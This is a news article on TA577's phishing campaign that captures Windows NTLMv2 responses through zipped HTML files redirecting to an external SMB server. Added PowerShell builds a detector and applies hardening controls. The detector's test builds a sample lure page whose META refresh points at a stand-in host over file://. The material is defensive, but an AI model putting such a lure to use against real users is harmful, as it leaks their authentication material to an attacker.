Hackers use Windows authentication flaw to hack user accounts


Mélina LOUPIA

March 5, 2024 at 3:40 p.m.


This gang of hackers is after Windows - © rafapress / Shutterstock.c

A group of cybercriminals is behind a new phishing campaign whose objective is to steal users' Windows authentication hashes.

The TA577 group, known for its involvement in the Black Basta ransomware, recently launched two waves of phishing attacks targeting employees’ NTLM hashes. These attacks were spotted by the company Proofpoint, which specializes in email security.

Used for Windows authentication, especially when Kerberos cannot be used, NTLM authentication is vulnerable to various attacks.

These hashes can be used to crack passwords, access sensitive information, and move laterally within a compromised network.

The “thread hijacking” tactic

The new campaign began with phishing emails that appear to be replies to an earlier email conversation with the target, a technique known as "thread hijacking."

Example of fraudulent email - © Proofpoint

The emails carry ZIP archives that are unique per victim and contain HTML files. These HTML files use a META refresh tag to make the browser open a text file hosted on an external Server Message Block (SMB) server.

When the Windows device connects to that server, its SMB client automatically performs an NTLMv2 challenge-response, which lets the attacker-controlled server capture the NTLM authentication hash (more precisely, the NTLMv2 response) of the logged-on user.

"It should be noted that TA577 delivered the malicious HTML code in a ZIP archive in order to generate a local file on the host," the Proofpoint report states.

Proofpoint clarifies that these URLs did not deliver malware payloads and so their primary purpose appears to be capturing NTLM hashes.
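The lure mechanism described above can be checked for on the mail-gateway or analyst side without ever opening the file in a browser. The following PowerShell is an added example written for this page, not code from the article, Proofpoint or TA577: it opens a ZIP attachment, finds HTML entries, and flags any META refresh whose target is a file:// URL or a UNC path, since either makes the Windows SMB client connect out and answer the NTLMv2 challenge. The function name, the sample file names and the 203.0.113.10 address are constructed for the example (203.0.113.0/24 is a documentation range, not a real attacker host).

```powershell
# Added example, not code from the article or from Proofpoint: scan a ZIP
# attachment for HTML files whose META refresh points at a file:// or UNC
# (\\host\share) target. Function name, sample file names and the
# 203.0.113.10 address are constructed for this example.
Add-Type -AssemblyName System.IO.Compression.FileSystem

function Find-SmbRefreshInZip {
    param([Parameter(Mandatory)][string]$ZipPath)

    $findings = @()
    $zip = [System.IO.Compression.ZipFile]::OpenRead($ZipPath)
    try {
        foreach ($entry in $zip.Entries) {
            if ($entry.Name -notmatch '(?i)\.html?$') { continue }
            $reader = New-Object System.IO.StreamReader($entry.Open())
            try { $html = $reader.ReadToEnd() } finally { $reader.Dispose() }

            # Look at every <meta ...> tag, keep the refresh directives, and pull
            # the url= part out of their content attribute.
            foreach ($tag in [regex]::Matches($html, '(?is)<meta\b[^>]*>')) {
                $t = $tag.Value
                if ($t -notmatch '(?i)http-equiv\s*=\s*["'']?refresh') { continue }
                if ($t -notmatch '(?i)url\s*=\s*["'']?(?<url>[^"''>\s]+)') { continue }
                $url = $Matches['url']
                # file: scheme, \\host\share or //host/share: each of these makes
                # the SMB client connect out and answer the NTLMv2 challenge.
                if ($url -match '^(?i)(file:|\\\\|//)') {
                    $findings += [pscustomobject]@{
                        Entry  = $entry.FullName
                        Target = $url
                    }
                }
            }
        }
    } finally { $zip.Dispose() }
    return $findings
}

# Constructed sample: a lure page packed into a ZIP under $env:TEMP, then scanned.
$work = Join-Path $env:TEMP 'ta577-demo'
New-Item -ItemType Directory -Force -Path $work | Out-Null
$lure = '<html><head><meta http-equiv="refresh" content="0; url=file://203.0.113.10/share/invoice.txt"></head><body></body></html>'
Set-Content -Path (Join-Path $work 'invoice.html') -Value $lure -Encoding Ascii
$zipPath = Join-Path $work 'invoice.zip'
Compress-Archive -Path (Join-Path $work 'invoice.html') -DestinationPath $zipPath -Force

# Reports the entry name and the SMB target for the constructed sample.
Find-SmbRefreshInZip -ZipPath $zipPath | Format-Table -AutoSize
```

The check only catches the plain form of the tag; an HTML file that builds the same redirect from script or encoded strings would need to be rendered in a sandbox to observe the outbound SMB connection, which is why the firewall and NTLM controls discussed later matter regardless of mail filtering.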

The report also notes artifacts on the SMB servers that are not found on ordinary file servers, such as the open-source Impacket toolkit, an indication that these servers were set up for the phishing campaign.

Former cybersecurity professional Brian in Pittsburgh notes on X (formerly Twitter) that for threat actors to use these stolen hashes to break into networks, multi-factor authentication must be disabled on the accounts.

Vulnerability researcher Will Dormann suggests that the hashes may not be stolen to break into networks at all, but rather as a form of reconnaissance to find valuable targets: "I imagine that the combination of domain name, username and hostname could help find interesting targets."

But who benefits from the crime?

In other words, what is the point of stealing NTLM hashes?

The hacker group known as TA577 recently changed tactics, using phishing emails to steal NT LAN Manager (NTLM) authentication hashes to carry out account hijacking.

TA577 is believed to be an initial access broker (IAB), previously associated with Qbot and linked to Black Basta ransomware infections.

Separate TA577 campaigns, launched on February 26 and 27, 2024, delivered thousands of messages to hundreds of organizations around the world, targeting employees’ NTLM hashes.

NTLM hashes are used in Windows for authentication and session security. Captured hashes can be subjected to offline password cracking to recover the plaintext password.

NT hashes can also be used in pass-the-hash attacks that involve no cracking at all: the attacker presents the hash as-is to authenticate to a remote server or service. Note, however, that what this campaign captures is the NTLMv2 challenge-response, which is computed over a challenge supplied by the server. That value can be cracked offline or relayed to another service during the same exchange, but it cannot be replayed in pass-the-hash the way a raw NT hash can.

Stolen hashes can, under certain circumstances and depending on the security measures in place, allow attackers to escalate privileges, hijack accounts, access sensitive information, evade security products, and move laterally within a breached network.

Phishing email tactic appears to be effective © Shutterstock

How to counter these attacks?

Proofpoint says that restricting guest access on SMB servers does not mitigate the TA577 attack, because the attack relies on the client automatically authenticating to an external server and therefore never needs guest access.

A more effective measure is to configure the firewall to block all outbound SMB connections (TCP ports 445 and 139) to the Internet, which stops the NTLMv2 response from ever reaching the attacker's server.

Another protective measure is email filtering that blocks messages containing zipped HTML files, since these can trigger connections to untrusted endpoints when opened.

It is also possible to configure the policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" to deny outgoing NTLM. This prevents the hash from being sent at all, but it can break authentication to legitimate servers that still depend on NTLM, so it should be tested in audit mode first.

For organizations using Windows 11, Microsoft has introduced an additional SMB client setting that blocks NTLM authentication over SMB, which addresses this attack directly.
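The three host-side controls above, applied in the order a cautious administrator would use them, as an added PowerShell example written for this page (not from the article, Proofpoint or Microsoft documentation). It assumes an elevated session on a domain-joined Windows client; the firewall rule name, the use of the built-in "Internet" address keyword, and the 50-event sample size are choices made here and should be adapted to your own environment.

```powershell
# Added example, not from the article, Proofpoint or Microsoft documentation:
# the host-side controls discussed above, applied audit-first. Run elevated.
# The rule name, the "Internet" address scope and the event sample size are
# assumptions made for this example.

# 1. Restrict outgoing NTLM. This registry value backs the policy
#    "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers":
#    0 = allow all, 1 = audit all, 2 = deny all. Start with audit.
$msv = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'
Set-ItemProperty -Path $msv -Name 'RestrictSendingNTLMTraffic' -Type DWord -Value 1

# While in audit mode, event 8001 in the NTLM operational log records each
# outgoing NTLM authentication that would have been blocked. Review the
# targets before moving the value to 2; anything internal that shows up
# needs Kerberos or an explicit exception first.
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-NTLM/Operational'; Id = 8001 } `
    -MaxEvents 50 -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Message

# 2. Stop the SMB client from talking to the Internet at all. Block rules win
#    over allow rules in Windows Firewall, so scope the rule to non-local
#    addresses (the built-in "Internet" keyword) rather than Any, or internal
#    file servers and domain controllers break. Substitute explicit ranges if
#    network-location classification is not reliable on your estate.
New-NetFirewallRule -DisplayName 'Block outbound SMB to Internet' `
    -Direction Outbound -Action Block -Protocol TCP -RemotePort 445,139 `
    -RemoteAddress Internet -Profile Any

# 3. On Windows 11 builds that have it, refuse NTLM on the SMB client outright.
#    The -BlockNTLM parameter is absent on older builds, so check before calling.
$smbCmd = Get-Command Set-SmbClientConfiguration -ErrorAction SilentlyContinue
if ($smbCmd -and $smbCmd.Parameters.ContainsKey('BlockNTLM')) {
    Set-SmbClientConfiguration -BlockNTLM $true -Force
} else {
    Write-Warning 'SMB client NTLM blocking is not available on this build.'
}
```

Leave step 1 in audit for long enough to cover a normal business cycle (month-end jobs, backup windows) before switching the value to 2; the 8001 events are the only cheap way to see which legitimate services would otherwise stop authenticating.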

Source : Bleeping Computer, Proofpoint